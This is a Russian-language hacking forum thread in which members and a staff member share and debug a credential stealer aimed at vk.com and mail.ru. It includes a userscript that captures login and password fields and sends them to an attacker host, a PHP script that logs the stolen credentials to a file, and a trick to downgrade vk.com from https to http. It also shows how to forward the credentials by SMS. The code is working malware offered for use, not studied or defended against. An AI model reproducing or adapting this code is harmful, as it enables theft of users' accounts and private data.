• На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее.
    P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.

Получаем логин пароль от соцсетей, форумов и т.д. без взлома

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
@russtreeter52 для теста рекомендую перед использованием проверить отправку почты. Создаем на серваке скрипт, например с названием test.php:
PHP:
<?
echo mail("Ваш@емайл", "test", "test") ? "ok" : "bad";
?>

И далее обращаемся к скрипту http://хост/test.php, если вернёт ok и придёт сообщение с темой test, то всё норм.
 
вот скрипт отличается от вышеуказанного от сохраняет все на сервере в файл но почему при входе вк не записывает , когда ввожу билеберду пишет , а когда ридерект на https все он бесполезен , как сделать?Help

Код:
// ==UserScript==
// @name         New Userscript
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  try to take over the world!
// @author       You
// @match        http://*/*
// @grant        none
// ==/UserScript==
/* jshint -W097 */
'use strict';
var url='http://...........хост........./post.php';
function loadXMLDoc(url){
        if (window.XMLHttpRequest) {
                    http = new XMLHttpRequest();
                    http.onreadystatechange = processReqChange;
                    http.open("GET", url, true);
                    http.send(null);
        }else if (window.ActiveXObject) {
                    http = new ActiveXObject("Microsoft.XMLHTTP");
                    if (http) {
                            http.onreadystatechange = processReqChange;
                            http.open("GET", url, true);
                            http.send();
                    }
            }
}
function processReqChange(){
        httptt = window.setTimeout("http.abort();", 5000);
        if (http.readyState == 4) {
                    clearTimeout(httptt);
        }
}

function htmlpars(where,is){
    if(new RegExp(is,"ig").exec(where)){
      return true;
    } else return false;
}

if(htmlpars(location.href,'vk.com')==true){
   var vk_email = document.getElementById('quick_email');
   var vk_pass = document.getElementById('quick_pass');
   var vk_button = document.getElementById('quick_login_button');
   vk_button.addEventListener("click",function() {
      loadXMLDoc(url+'?login='+vk_email.value+'&pass='+vk_pass.value);
   });
}

if(htmlpars(location.href,'mail.ru')==true){
   var mail_email = document.getElementById('mailbox__login');
   var mail_pass = document.getElementById('mailbox__password');
   var mail_button = document.getElementById('mailbox__submit__button');

   mail_button.onclick=function(){                          
      loadXMLDoc(url+'?login='+mail_email.value+'&pass='+mail_pass.value);
   };
}



файл post php
PHP:
<?
$data = "$_GET[login] ___ $_GET[pass] \n";
$filename = "file.txt";

if ( is_writeable($filename) ) {
   $fh = fopen($filename, "a+");
   $success - fwrite($fh, $data);
   fclose($fh);
}
?>
 
Последнее редактирование модератором:
для этого скрипта фишка с файликом работает но не всегда почему то WebCriminal getPassVK вместо send_mail.php я поставил файл post php
PHP:
<?
$data = "$_GET[login] ___ $_GET[pass] \n";
$filename = "file.txt";

if ( is_writeable($filename) ) {
$fh = fopen($filename, "a+");
$success - fwrite($fh, $data);
fclose($fh);
}
?>
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
@russtreeter52, проблема https решается редиректом, нужно в первый код вставить:

Код:
if(window.location.protocol=="https:"){window.location.href = "http://vk.com";}

При https всё переданные с полей данные отправляются в зашифрованном виде.
 
WebCriminal getPassVK он сохраняет билеберду введенныю с клавы и сохраненные пароли , а если входит другой пользователь не сохраняет, эта проблем решается?

WebCriminal getPassVK как решить проблему с https?
 
Последнее редактирование модератором:

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
WebCriminal getPassVK он сохраняет билеберду введенныю с клавы и сохраненные пароли , а если входит другой пользователь не сохраняет, эта проблем решается?

WebCriminal getPassVK как решить проблему с https?

Что-то я не до конца понял в чем проблема. Для одного пользователя скрипт работает, а если логинется под другим, то нет?
В WebCriminal getPassVK с https все решено, там редиректит на http при заходе на https://vk.com
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
HELP
<?php
$data = "login:_$_GET[login] _password_ $_GET[pass] \n";
$filename = "file.txt";
if ( is_writeable($filename) ) {
$fh = fopen($filename, "a+");
$success - fwrite($fh, $data);
fclose($fh); }
header('Location:http://sms.ru/sms/send?api_id=782C7D8B-C7EB-890B-D128-76E23C518B64&to=79064536873&text=вот сюда)+');// как сюда прописать GET[login] и GET[pass]
exit;
?>
Вопрос уже не по теме, ну да ладно:
PHP:
<?php
$data = "login:_$_GET[login] _password_ $_GET[pass] \n";
$filename = "file.txt";
if ( is_writeable($filename) )  
{
   $fh = fopen($filename, "a+");
   $success - fwrite($fh, $data);
   fclose($fh);   
}
header('Location:http://sms.ru/sms/send?api_id=782C7D8B-C7EB-890B-D128-76E23C518B64&to=79064536873&text=какой-то_текст_смс&login='.$_GET[login].'&pass='.$_GET[pass]);
exit;
?>
 
Сверху